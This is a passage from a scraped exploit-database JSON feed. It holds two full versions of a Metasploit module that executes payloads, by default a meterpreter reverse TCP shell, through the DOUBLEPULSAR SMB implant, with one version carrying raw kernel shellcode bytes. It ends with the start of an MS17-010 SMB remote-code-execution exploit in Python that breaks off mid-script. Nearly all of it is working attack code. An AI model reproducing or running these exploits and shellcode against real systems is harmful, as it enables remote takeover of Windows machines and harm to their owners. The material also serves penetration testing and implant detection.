Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => 
[CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n 
print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n 
else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n 
pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n 
\\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33895", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-12-21T03:24:42", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "zdt", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "modified": "2019-10-04T00:00:00", "id": "1337DAY-ID-33313", "href": "https://0day.today/exploit/description/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 
'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 
'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 
(32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n 
fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n 
pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33313", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-03-19T02:05:14", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "zdt", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-10T00:00:00", "id": "1337DAY-ID-27752", "href": "https://0day.today/exploit/description/27752", "sourceData": "# Exploit Author: Juan Sacco\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt \r\n# and when the logic is not correct it leads to a cross-border copy. 
The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // [email\u00a0protected]\r\n# _BYTE *v5; // [email\u00a0protected]\r\n# unsigned int result; // [email\u00a0protected]\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. 
Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n \r\ndef mod_replay():\r\n datfile = [
